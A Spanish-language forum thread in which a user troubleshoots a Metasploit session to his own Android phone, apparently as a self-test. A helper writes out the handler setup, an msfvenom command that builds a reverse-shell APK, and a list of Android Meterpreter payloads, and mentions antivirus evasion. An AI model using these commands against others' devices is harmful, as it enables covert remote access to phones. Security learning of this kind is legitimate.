Hack x Crack - Comunidad de Seguridad informática

Seguridad Informatica => Hacking => Mensaje iniciado por: ticox en Junio 19, 2021, 12:49:20 am

Título: Ayuda con error en metasploit
Publicado por: ticox en Junio 19, 2021, 12:49:20 am
Hola, me interesó el tema de metasploit e intenté conectar mi celular via tcp y la conexión se establece pero al momento de indicar a la consola para que interactue con el dispositivo, la sesión se cierra.
Probé con mi windows via https y todo perfecto, vi en otros foros que recomendaban conectarse al celular via https y tampoco funcionó. Estoy usando kali linux en una maquina virtual.
¿Alguien tiene una posible solución?
Título: Re:Ayuda con error en metasploit
Publicado por: R3LI4NT en Junio 21, 2021, 05:43:11 pm
Hi @ticox.

Posiblemente se trata de un error al poner la IP pública o mal el puerto, quisiera que me confirmes lo anterior.

Ej:
set lport 4444

set lhost local ip(192.168.1.3)


Un antiguo miembro del foro hizo un tutorial, échale un vistazo: https://hackxcrack.net/foro/hacking/vulnerando-un-android-y-consiguiendo-una-sesion-de-meterpreter-con-metasploit/

Título: Re:Ayuda con error en metasploit
Publicado por: ticox en Junio 21, 2021, 07:12:00 pm
Hola y gracias por responder pero el error no se haya ni en el puerto ni en la ip. El tutorial de aquel miembro lo leí antes de iniciar el tema y él dice que talvez el celular le haya detectado como malware y bueno mi error es similar aunque no exactamente el mismo porque en mi caso la conexion entre el celular y kali se establece pero al yo intentar interactuar desde kali con el celular, la conexion se cierra y no especifica razón, solo se cierra.
Título: Re:Ayuda con error en metasploit
Publicado por: R3LI4NT en Junio 22, 2021, 12:16:10 am
En los celulares recientes es muy fácil que te lo detecte como malicioso, hasta el propio Google Play Project se da cuenta y más cuando el malware no esta codificado para evadir cualquier antivirus.

¿Tienes más de una sesión meterpreter? ¿en RHOST que pusiste?, dime que comandos y payload ejecutas para poder tener una mejor visión a tu problema.
Título: Re:Ayuda con error en metasploit
Publicado por: ticox en Junio 22, 2021, 02:38:17 am
Estás en lo cierto aunque vi videos recientes en los que a pesar de ser detectados les funciona. En el enlace https://prnt.sc/169buup están los comandos que uso en la consola. Solo está la sesion de mi movil, en otras pruebas a veces se generaban más de una pero del mismo movil y en LHOST coloqué la ip que me lanza ifconfig 192.168.1.xx la x representa los otros dos números que me arroje en el momento.
Título: Re:Ayuda con error en metasploit
Publicado por: R3LI4NT en Junio 22, 2021, 04:46:49 am
Es paylaod y no "playload". Recomiendo sustituir el puerto 8080 al 4444 o 555. Antes de ejecutar "run" imagino que habrás creado el apk... ¿no?

- use exploit/multi/handler
- set payload android/meterpreter/reverse_tcp
- set LHOST *IP*
- set LPORT 4444
- msfvenom -p android/meterpreter/reverse_tcp LHOST=IP LPORT=4444 R > name.apk
- run

¿Estas usando algún adaptador de red? de ser así, ¿introduces la IP que te devuelve la interfaz eth0 o wlan0?

Volviendo al principio, posiblemente te detecte el apk como virus o troyano, suele ser para versiones anteriores de android. Prueba otros payloads:

set payload android/meterpreter/reverse_http
set payload android/meterpreter/reverse_https
set payload android/meterpreter/reverse_tcp
set payload android/meterpreter_reverse_http
set payload android/meterpreter_reverse_https
set payload android/meterpreter_reverse_tcp
Título: Re:Ayuda con error en metasploit
Publicado por: ticox en Junio 22, 2021, 02:13:36 pm
Vaya la falla estaba en la palabra playload, error de typing te digo que no sé nada del hacking aún jaja, muchas gracias. Ahora funciona correctamente.
Título: Re:Ayuda con error en metasploit
Publicado por: R3LI4NT en Junio 22, 2021, 04:55:50 pm
Vaya la falla estaba en la palabra playload
Como una palabra mal escrita puede llegar a cambiar todo.

De nada, saludos!

CASO SOLUCIONADO